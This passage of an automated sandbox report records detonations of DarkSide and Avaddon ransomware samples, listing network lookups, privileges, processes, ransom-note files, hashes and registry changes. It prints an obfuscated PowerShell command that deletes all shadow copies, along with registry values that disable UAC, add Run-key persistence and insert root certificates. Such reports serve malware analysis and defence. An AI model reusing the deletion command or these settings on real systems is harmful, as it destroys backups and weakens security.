US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp

Files

memory/2420-1-0x00007FF869C93000-0x00007FF869C95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1u4mrdkd.pi2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2420-3-0x00000214A4D70000-0x00000214A4D92000-memory.dmp

memory/2420-12-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

memory/2420-13-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

memory/2420-14-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

memory/2420-17-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 95e1c8db6eb5be60fa7c5f7ca36bfaed
SHA1 5b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9
SHA256 3b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18
SHA512 de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db

C:\Users\Admin\README.d3877f44.TXT

MD5 d4e176b40c4ea17f4870c34fad926d6e
SHA1 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512 feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral21

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240705-en

Max time kernel

29s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (143) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/3068-0-0x0000000000C40000-0x0000000000C50000-memory.dmp

memory/580-5-0x000007FEF56FE000-0x000007FEF56FF000-memory.dmp

memory/580-6-0x000000001B680000-0x000000001B962000-memory.dmp

memory/580-7-0x0000000002340000-0x0000000002348000-memory.dmp

memory/580-8-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/580-9-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/580-11-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/580-10-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/3068-12-0x0000000000C40000-0x0000000000C50000-memory.dmp

memory/580-13-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

C:\Users\README.e528f7ef.TXT

MD5 25d0b19a0ec34a39dfa3e177866f01a3
SHA1 a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256 f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512 ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

memory/3068-23-0x0000000000C40000-0x0000000000C50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 39ca3a64d512eb6223252000fce5e706
SHA1 b6a218024c140101e0f25026795107e803756cc6
SHA256 208eac0667def9a016803ce9dfaf8c948324045a2570073d7a847608e538264c
SHA512 68700aa3c74cfc01af8f7e6a019653c2b5ae2ca778e76ef806d1d643ae46c01113cf20abe43e81d205e086a4844594578fd114fc118b711616425c9e95014c31

memory/3068-211-0x0000000000C40000-0x0000000000C50000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:40

Platform

win7-20240708-en

Max time kernel

65s

Max time network

72s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (279) files with added filename extension

ransomware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-940600906-3464502421-4240639183-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{09CDD5B1-4D00-11EF-B586-DECC44E0FF92} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d09f86df0ce1da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003e1c4d4a7885794291b78de8e6dfadfd000000000200000000001066000000010000200000005bea3f150a57aa271f0a1119da73c1f3428925132e16624de0f98204ae8747a5000000000e8000000002000020000000c304fbccabc967f57966edffcad2b565ecf683d147601626fd5b27a6da23f70420000000e59820f974b56626c6ec9aee92fef11badc5630b2b04beae3ec77eafaa6df3df400000003b8e14ba30eb0211c28b4cc6f988c8d13cc583644700d7f0d46d82aa055bfeba37b90818b61aec595c78a28e44bae8f6833fb9c8f95c55a3eb0d9ec53ee83004 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 